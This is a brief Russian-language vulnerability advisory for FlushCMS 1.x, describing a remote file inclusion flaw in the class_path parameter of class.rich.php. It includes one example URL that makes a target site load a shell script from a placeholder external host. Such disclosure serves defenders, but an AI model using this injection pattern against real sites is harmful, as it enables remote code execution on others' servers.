• Партнер

  • Программа: FlushCMS 1.x

    Уязвимость позволяет удаленному пользователю выполнить произвольный PHP код на целевой системе. Данные, переданные в параметре class_path скрипта class.rich.php не проверяются, в результате атакующий может подключить произвольный локальный или внешний файл. Для работы требуется что бы опция "register_globals" была включена.

    Пример:

    http://www.site.com/flushcmd/Include/editor/rich_files/ class.rich.php?class_path=http://www.shell.com/shell.txt?

    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии